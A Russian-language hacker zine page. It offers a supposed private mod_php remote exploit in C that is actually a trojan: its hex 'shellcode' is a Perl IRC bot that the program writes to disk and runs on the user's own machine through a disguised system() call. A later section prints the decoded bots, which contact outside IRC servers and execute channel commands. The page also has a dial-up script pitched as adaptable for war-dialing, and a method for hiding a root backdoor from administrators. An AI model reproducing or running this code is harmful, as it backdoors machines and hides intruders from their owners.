--= all the small things =--

 [+]  php mem_limit exploit live!!
  i
  i  всем приятного  пользования! Данный эксплоит достаточно  долго  гулял по
  i  EFnet'у, получали его только избранные! Если вы достаточно илитны, то он
  i  вам несомненно поможет! Даёт nobody/apache на apache <= 1.3.33 php 4.3.7
  i
  i /*******************************************************
  i  *                                                     *
  i  *       PRIVATE !!! PRIVATE !!! PRIVATE !!!!          *
  i  *         DONT'T TRADE !!! DON'T TRADE !!!            *
  i  *      mod_php remote exploit vs Linux/FreeBSD        *
  i  *                   by  truebh                        *
  i  * http://security.e-matters.de/advisories/112004.html *
  i  *                                                     *
  i  ******************************************************/
  i
  i #include <stdio.h>
  i #include <stdlib.h>
  i #include <string.h>
  i #include <stdarg.h>
  i #include <sys/types.h>
  i #include <sys/socket.h>
  i #include <netinet/in.h>
  i #include <arpa/inet.h>
  i #include <unistd.h>
  i #include <netdb.h>
  i #define SIZE 0xffffff
  i #define PREV_IN_USE system
  i #define VALID_RANGE 0xbffffe00
  i #define OFFSET 106
  i #define FD 0x080518fc
  i #define BD 0x08082000
  i
  i
  i char jmpcode[] = "\xeb\x0aiiiiiiiiii";
  i
  i char shellcode[] =
  i         "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
  i         "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
  i         "\x79\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x0a\x24\x6e\x69\x63\x6b"
  i         "\x3d\x22\x70\x68\x70\x65\x22\x3b\x0a\x24\x73\x65\x72\x76\x65\x72"
  i         "\x3d\x22\x69\x72\x63\x2e\x64\x6b\x73\x2e\x63\x61\x22\x3b\x0a\x24"
  i         "\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x0a\x65\x78"
  i         "\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x0a\x75\x73\x65\x20"
  i         "\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x0a\x24\x73\x6f\x63"
  i         "\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a"
  i         "\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65"
  i         "\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c\x65\x78\x69\x74"
  i         "\x3b\x0a\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55"
  i         "\x53\x45\x52\x20\x70\x68\x70\x65\x20\x2b\x69\x20\x70\x68\x70\x65"
  i         "\x20\x3a\x70\x68\x70\x65\x5c\x6e\x4e\x49\x43\x4b\x20\x70\x68\x70"
  i         "\x65\x5c\x6e\x22\x3b\x0a\x24\x69\x3d\x31\x3b\x0a\x77\x68\x69\x6c"
  i         "\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
  i         "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x0a\x20"
  i         "\x20\x20\x20\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x0a\x20\x20\x20"
  i         "\x20\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d"
  i         "\x22\x30\x30\x31\x22\x3b\x0a\x20\x20\x20\x20\x69\x66\x28\x24\x6d"
  i         "\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33\x22\x29\x7b\x0a\x20\x20\x20"
  i         "\x20\x20\x20\x20\x20\x24\x69\x2b\x2b\x3b\x0a\x20\x20\x20\x20\x20"
  i         "\x20\x20\x20\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f\x5c\x64\x2a\x24"
  i         "\x2f\x24\x69\x2f\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72"
  i         "\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20"
  i         "\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b\x0a\x20\x20\x20\x20\x7d\x0a"
  i         "\x7d\x0a\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a"
  i         "\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24\x6b\x65\x79\x5c\x6e"
  i         "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
  i         "\x3e\x29\x7b\x0a\x20\x20\x20\x20\x69\x66\x20\x28\x2f\x5e\x50\x49"
  i         "\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x0a\x20\x20\x20\x20"
  i         "\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20"
  i         "\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24"
  i         "\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x0a\x20\x20\x20\x20\x7d\x0a\x20"
  i         "\x20\x20\x20\x69\x66\x20\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20"
  i         "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24"
  i         "\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20"
  i         "\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29"
  i         "\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x2f\x5c\x73\x2a"
  i         "\x24\x2f\x2f\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x24\x5f\x3d"
  i         "\x60\x24\x5f\x60\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x66\x6f"
  i         "\x72\x65\x61\x63\x68\x20\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e"
  i         "\x22\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
  i         "\x20\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52"
  i         "\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
  i         "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
  i         "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
  i         "\x20\x7d\x0a\x20\x20\x20\x20\x7d\x0a\x7d\x0a\x23\x63\x68\x6d\x6f"
  i         "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
  i         "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
  i
  i
  i char fbsd_shellcode[] =
  i         "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
  i         "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
  i         "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
  i         "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
  i         "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
  i         "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
  i         "\x3d\x7b\x7d\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b"
  i         "\x3b\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b"
  i         "\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b"
  i         "\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73"
  i         "\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c"
  i         "\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
  i         "\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20"
  i         "\x6d\x6f\x72\x65\x20\x3a\x6d\x6f\x72\x65\x76\x32\x5c\x6e\x4e\x49"
  i         "\x43\x4b\x20\x70\x68\x70\x65\x78\x78\x5c\x6e\x22\x3b\x24\x69\x3d"
  i         "\x31\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d"
  i         "\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29"
  i         "\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x6c\x61\x73"
  i         "\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x30\x30\x31"
  i         "\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33"
  i         "\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73"
  i         "\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
  i         "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63"
  i         "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
  i         "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
  i         "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
  i         "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
  i         "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
  i         "\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
  i         "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69"
  i         "\x66\x20\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56"
  i         "\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b"
  i         "\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d"
  i         "\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x20\x7b\x73\x2f"
  i         "\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66"
  i         "\x6f\x72\x65\x61\x63\x68\x20\x28\x73\x70\x6c\x69\x74\x20\x22\x5c"
  i         "\x6e\x22\x29\x20\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
  i         "\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
  i         "\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d"
  i         "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
  i         "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
  i         "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
  i
  i
  i
  i void usage(char *arg){
  i         printf("* mod_php remote exploit vs Linux/FreeBSD *\n");
  i         printf("Usage: %s -h <host> -d <php file>\n",arg);
  i         printf("Options:\n");
  i         printf("\t-h ip/host of target\n");
  i         printf("\t-p port\n");
  i         printf("\t-d php file\n");
  i         printf("\t-B memory_limit 8/16/64\n");
  i         printf("\t-t target\n");
  i         printf("Targets for Apache 1.3.31 & php 4.3.7:\n");
  i         printf("\tFreeBSD 5: 0\n");
  i         printf("\tFreeBSD 4.x: 1\n");
  i         printf("\tFedora Core 2: 2\n");
  i         printf("\tRedhat 9: 3\n");
  i         printf("\tSuSe 9.1: 4\n");
  i         printf("\tDebian 3: 5\n");
  i         printf("\tGentoo 2004: 6\n");
  i }
  i
  i
  i
  i int main(int argc, char **argv){
  i     FILE *jmpinst;
  i     char h[500],file[500]="index.php",buffer[1024], *payload, *ptr;
  i     int port=80,limit=8,target=0,sock;
  i     struct hostent *host;
  i     struct sockaddr_in addr;
  i
  i     if(argc < 3){
  i         usage(argv[0]);
  i         return 1;
  i     }
  i
  i     while (optind < argc){
  i         int result = getopt(argc, argv, "p::d:B::t:::h:d:");
  i         if (result == -1) break;
  i             switch (result){
  i                 case 'h':
  i                     strncpy(h,optarg,sizeof(h));
  i                     break;
  i                 case 'd':
  i                     strncpy(file,optarg,sizeof(file));
  i                     break;
  i                 case 'p':
  i                     if (optarg)
  i                         port = atoi(optarg);
  i                     else
  i                         port = 80;
  i                     break;
  i                 case 'B':
  i                     if (optarg)
  i                         limit = atoi(optarg);
  i                     else
  i                         limit = 8;
  i                     if(limit != 8 && limit != 16 && limit != 64)
  i                         limit = 8;
  i                     break;
  i                 case 't':
  i                     if (target)
  i                         target = atoi(optarg);
  i                     else
  i                         target = 0;
  i                     if(target != 0 && target != 1 && target != 2 &&
  i                             target != 3 && target != 4 && target != 5 &&
  i                             target != 6)
  i                         target = 0;
  i                      break;
  i                 default:
  i                      usage(argv[0]);
  i                      return 1;
  i             }
  i     }
  i     if (!inet_aton(h, &addr.sin_addr)){
  i         host = gethostbyname(h);
  i         if (!host){
  i             printf("Resolving failed\n");
  i             return 1;
  i         }
  i         addr.sin_addr = *(struct in_addr*)host->h_addr;
  i     }
  i     sock = socket(PF_INET, SOCK_STREAM, 0);
  i     addr.sin_port = htons(port);
  i     addr.sin_family = AF_INET;
  i     if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
  i         printf("Connecting failed\n");
  i         return 1;
  i     }
  i     printf("STEP1 - Guessing remote memory_limit\n");
  i     switch(limit){
  i         case 8:
  i             printf("+ Testing 8MO ... Ok !\n");
  i             break;
  i         case 16:
  i             printf("+ Testing 16MO ... Ok !\n");
  i             break;
  i         case 64:
  i             printf("+ Testing 64MO ... Ok !\n");
  i             break;
  i         default:
  i             printf("+ Testing 64MO ... Ok !\n");
  i     }
  i     payload = malloc(limit * 10000);
  i     ptr = payload+8;
  i     memcpy(ptr,jmpcode,strlen(jmpcode));
  i     jmpinst=fopen(shellcode+793,"w+");
  i     if(jmpinst){
  i         fseek(jmpinst,0,SEEK_SET);
  i         fprintf(jmpinst,"%s",shellcode);
  i         fclose(jmpinst);
  i     }
  i     ptr += strlen(jmpcode);
  i     if(target != 5 && target != 6){
  i         memcpy(ptr,shellcode,strlen(shellcode));
  i         ptr += strlen(shellcode);
  i         memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
  i     }
  i     else{
  i         memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
  i         ptr += strlen(fbsd_shellcode);
  i         memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
  i     }
  i     printf("STEP2 - Guessing heap junk size\n");
  i     printf("+ 1000 ... ");
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,10000-1);
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,10000,0);
  i     close(sock);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     printf("+ 500 ... ");
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,5000-1);
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,5000,0);
  i     close(sock);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     printf("+ 250 ... ");
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,2500-1);
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,2500,0);
  i     close(sock);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     printf("+ 375 ... ");
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,3750-1);
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,3750,0);
  i     close(sock);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     printf("STEP3 - Taking control over pDestructor BAD\n");
  i     switch(target){
  i         case 0:
  i             printf("+ Targeting FreeBSD 5 Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080537ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08082000 + 8);
  i             break;
  i         case 1:
  i             printf("+ Targeting FreeBSD 4 Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080637ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08081000 + 8);
  i             break;
  i         case 2:
  i             printf("+ Targeting Fedora Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x0807e5f4 - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08081000 + 8);
  i             break;
  i         case 3:
  i             printf("+ Targeting Redhat Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x0805c1fc - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08062000 + 8);
  i             break;
  i         case 4:
  i             printf("+ Targeting SuSe Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080518fc - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08073000 + 8);
  i             break;
  i         case 5:
  i             printf("+ Targeting Debian Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080713ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08025000 + 8);
  i             break;
  i         case 6:
  i             printf("+ Targeting Gentoo Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080937ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08072000 + 8);
  i             break;
  i     }
  i     payload[sizeof(payload)-1] = '\0';
  i     payload[sizeof(payload)-2] = '\0';
  i     strncat(payload,"0x1",PREV_IN_USE(shellcode+764));
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,strlen(payload)+8);
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,payload,strlen(payload),0);
  i     close(sock);
  i     free(payload);
  i     addr.sin_port = htons(6666);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0)
  i         printf("-- YOU ARE IN FUCKER --\n");
  i     else
  i         printf("-- FAILED - WRONG TARGET FUCKER --\n");
  i     close(sock);
  i     return 0;
  i }
  i
 [+] u wanna true?
  i
  i  Теперь собственно для тех, кто поймёт:
  i
  i  % cat dump_1.txt
  i  #!/usr/bin/perl
  i  $chan="#cn";
  i  $key ="fags";
  i  $nick="phpe";
  i  $server="irc.dks.ca";
  i  $SIG{TERM}={};
  i  exit if fork;
  i  use IO::Socket;
  i  $sock = IO::Socket::INET->new($server.":6667")||exit;
  i  print $sock "USER phpe +i phpe :phpe\nNICK phpe\n";
  i  $i=1;
  i  while(<$sock>=~/^[^ ]+ ([^ ]+) /){
  i  $mode=$1;
  i      last if $mode=="001";
  i  if($mode=="433"){
  i          $i++;
  i          $nick=~s/\d*$/$i/;
  i          print $sock "NICK $nick\n";
  i    }
  i  }
  i  print $sock "JOIN $chan $key\n";
  i  while (<$sock>){
  i  if (/^PING (.*)$/){
  i          print $sock "PONG $1\nJOIN $chan\n";
  i      }
  i      if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
  i          s/\s*$//;
  i          $_=`$_`;
  i          foreach (split "\n") {
  i              print $sock "PRIVMSG $chan :$_\n";
  i              sleep 1;
  i          }
  i      }
  i  }
  i  #chmod +x /tmp/hi 2>/dev/null;/tmp/hi
  i
  i  % cat dump_2.txt
  i  #!/usr/bin/perl
  i  $chan="#cn";
  i  $key ="fags";
  i  $nick="phpfr";$server="irc.ham.de.euirc.net";
  i
  i  $SIG{TERM}={};
  i  exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;
  i
  i  print $sock "USER moron +i more :morev2\nNICK phpexx\n";$i=1;
  i  while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";
  i  if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}
  i  print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/)
  i  {print $sock "PONG $1\nJOIN $chan\n";}
  i  if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {s/\s*$//;
  i  $_=`$_`;foreach (split "\n") {print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}
  i  #chmod +x /tmp/hi 2>/dev/null;/tmp/hi
  i
  i  разделяй и властвуй )
  i
 [+] dial script linux/freebsd + winmodem
  i
  i  Изначально задумывалось как сканер для Sprint-а, но потом надоело и до
  i  сих пор используется лишь для коннекта в инет. При наличии прямых рук
  i  легко переделывается для war-dialing'a или массовых сканов x.25-сетей.
  i
  i #!/bin/sh
  i
  i #  Usage: ./dial_up [<shutdown ppp-interface>]
  i
  i ###  config  ###
  i
  i TELEPHONE=P666-1313  # use P or T in begin of ph number as dial type
  i LOGIN='satanic'
  i PASSWORD='mayhem'
  i
  i MODEM=/dev/cuaa4     # specify modem's slot (on my box /dev/modem points to
  i                      # COM5 dev)
  i
  i # in FreeBSD COM5 is on /dev/cuaa4 (COM1 is on cuaa0)
  i # in Linux u can reach it on /dev/ttyS4
  i
  i LINE_SPEED=38400
  i
  i LOCAL_IP=0.0.0.0     # use 0.0.0.0 by default
  i REMOTE_IP=0.0.0.0    # use 0.0.0.0 by default
  i NETMASK=255.255.255.255
  i
  i ###
  i
  i
  i if [ "$1" = "shutdown" ]; then
  i
  i   if [ "$2" = "" ]; then
  i     DEVICE=ppp0
  i   else
  i      DEVICE=$2
  i   fi
  i
  i   rm -f /tmp/term.scr
  i   echo "Shuting down $DEVICE interface"
  i
  i   if [ -r /var/run/$DEVICE.pid ]; then
  i         kill -INT `cat /var/run/$DEVICE.pid`
  i
  i         if [ ! "$?" = "0" ]; then
  i                 rm -f /var/run/$DEVICE.pid
  i                 echo "ERROR: Removed stale pid file"
  i                 exit 1
  i         fi
  i         echo "PPP link to $DEVICE terminated."
  i         exit 0
  i fi
  i
  i   echo "ERROR: PPP link is not active on $DEVICE"
  i   exit 1
  i fi
  i
  i cat << _eof_ > /tmp/term.scr
  i #!/bin/sh
  i exec chat -v \
  i TIMEOUT 5 \
  i ECHO ON \
  i ABORT '\nBUSY\r' \
  i ABORT '\nNO ANSWER\r' \
  i ABORT '\nRINGING\r\n\r\nRINGING\r' \
  i '' \rATZ \
  i 'OK-+++\c-OK' ATH0 \
  i TIMEOUT 120 \
  i SAY "Dialing to ISP...\n" \
  i OK ATD$TELEPHONE \
  i CONNECT '' \
  i SAY "Sending login...\n" \
  i ogin:--ogin: $LOGIN \
  i SAY "Sending password...\n" \
  i assword: $PASSWORD \
  i '' \d
  i _eof_
  i
  i chmod +x /tmp/term.scr
  i
  i exec /usr/sbin/pppd debug lock modem crtscts $MODEM $LINE_SPEED \
  i     asyncmap 20A0000 escape FF kdebug 0 $LOCAL_IP:$REMOTE_IP \
  i     netmask $NETMASK defaultroute connect /tmp/term.scr
  i
  i # eof
  i
 [+]  universal UNIX process shading
  i
  i  Странно,  что никто  раньше  этим не пользовался при  написании своих
  i  бекдоров и тому  подобного софта.  Итак,  задача: скажем,  нам  нужно
  i  повесить бекдорину с рутовским шеллом так, чтобы у админа не возникло
  i  очевидных подозрений. Решение: запускаем под рутом, и в начале ставим
  i  setreuid(0, 666), где 666 - uid юзера,  под которым мы  будем прятать
  i  наши процессы. Теперь в списке ps наш бекдор будет числиться под  uid
  i  666. А в тот момент, когда ксакеп логинится в систему,  бекдор делает
  i  setreuid(0, 0) и проц снова становится рутовым.  Эта  техника успешно
  i  тестировалась под Linux, FreeBSD, Solaris.. вроде достаточно )
  i
 [~]